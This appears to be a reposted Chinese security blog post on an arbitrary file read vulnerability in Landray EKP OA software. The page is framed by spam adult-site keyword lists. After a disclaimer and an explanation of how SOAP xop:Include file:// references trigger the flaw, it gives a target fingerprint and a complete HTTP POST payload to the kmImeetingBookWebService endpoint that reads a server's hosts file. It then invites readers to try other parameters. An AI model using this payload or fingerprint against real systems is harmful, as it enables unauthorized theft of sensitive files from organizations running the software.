日韩欧美国产精品免费一二-日韩欧美国产精品亚洲二区-日韩欧美国产精品专区-日韩欧美国产另-日韩欧美国产免费看-日韩欧美国产免费看清风阁

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

藍凌OA任意文件讀取漏洞

admin
2025年1月9日 19:48 本文熱度 672
0x01.技術文章僅供參考學習,請勿使用本文中所提供的任何技術信息或代碼工具進行非法測試和違法行為。若使用者利用本文中技術信息或代碼工具對任何計算機系統造成的任何直接或者間接的后果及損失,均由使用者本人負責。本文所提供的技術信息或代碼工具僅供于學習,一切不良后果與文章作者無關。使用者應該遵守法律法規,并尊重他人的合法權益。

0x02 簡介
藍凌EKP由深圳市藍凌軟件股份有限公司自主研發,是一款全程在線數字化OA,應用于大中型企業在線化辦公,包含流程管理、知識管理、會議管理、公文管理等等。藍凌0A的thirdImSyncForKKWebService接口存在任意文件讀取漏洞。攻擊者可利用漏洞獲取系統敏感信息。
0x03 指紋信息
web.icon=="302464c3f6207d57240649926cfc7bd4"
0x04 漏洞復現
在上一篇文章中分析說了任意文件讀取接口不止那一處,因為他造成任意文件讀取的不是像我們之前常見的filename,path,url這種。而是觸發漏洞的是soap中包含了xop:Include標簽,也就是我可以在poc中的任意位置插入paylaod。
SOAP 的 XOP 擴展:
SOAP 的 XOP 擴展:xop:Include 是 SOAP 附件優化機制(XML-binary Optimized Packaging)。如果服務器端 SOAP 框架支持 XOP,并未禁用 file:// 協議,它可能會嘗試解析 href 指向的文件內容。觸發條件:如果服務器端解析 SOAP 的 type 字段時,遇到 xop:Include 的 href 屬性,會調用底層的 URI 解析方法(如 new URL().openStream()),加載指定文件。
那么還有另外的幾個webservice接口中也是存在任意文件讀取漏洞的。kmImeetingBookWebService接口,觸發漏洞的參數是count,其實也就是說在任意的service接口中帶有count參數或者type參數都能夠觸發漏洞。回顯還是正常的base64數據需要解密就能或者到數據了。
漏洞payload
POST /sys/webservice/kmImeetingBookWebService HTTP/1.1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: SESSION=MmM1ZWZjYWQtZDQ1Mi00NWU3LWI4ZmMtNmQwY2UyYWRkNzEzConnection: close closeContent-Type: multipart/related; boundary=----oxmmdmlnvlx08yluof5qSOAPAction: Content-Type: text/xml;charset=UTF-8Host: Content-Length: 597------oxmmdmlnvlx08yluof5qContent-Disposition: form-data; name="111"<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.imeeting.km.kmss.landray.com/">   <soapenv:Header/>   <soapenv:Body>      <web:getImeetingBook>         <arg0>            <!--type: string-->            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:\Windows\System32\drivers\etc\hosts"/></count>         </arg0>      </web:getImeetingBook>   </soapenv:Body></soapenv:Envelope>------oxmmdmlnvlx08yluof5q--
其實還有好幾個參數都存在大家可以去試試?


閱讀原文:原文鏈接


該文章在 2025/1/10 10:34:51 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved

主站蜘蛛池模板: 欧美一区二区三区精品国产 | 亚洲最新国产一区二区三区 | 国产成自拍亚洲精品 | 日本韩国欧美午夜 | 中文字幕一区二区三区不卡 | 亚洲午夜成激人情在线国内 | 亚洲中文字幕姦 | 日日摸夜夜摸人人看 | 免费人成在线观看vr网站 | 日本最新伦中文字幕 | 一区二区三区免费 | 国产小说| 亚洲日韩欧美国产精品共 | 国产欧美一区二区精品仙草咪 | 在线观看成人影院 | 国产女主播精品大秀系列 | 欧美一区日韩二区在线观看 | 在线中文字幕亚洲 | 91青青青青国产在线观看 | 日韩精品一区二区三区高清 | 国产宅男宅女在线观看 | 国语fre| 日本人乱亲伦视频 | 日韩欧美在线综合va网 | 亚洲经典| 国产一级精品精冻电话 | 日韩国产一区二区 | 欧美综合自拍亚洲综合百度 | 日韩成人高清在线免费 | 在线视频一区二区三区三区不卡 | 国产日产亚洲欧美综合另类 | 日本在线播放 | 三级国产在线观看 | 福利一区二区在线 | 亚洲vr | 日韩电影手机在线观看 | 精品第一国产 | 国产日产欧美一区二区三区 | 国产精品欧美亚洲制服 | 亚洲精品在线不卡 | 伦子系列 |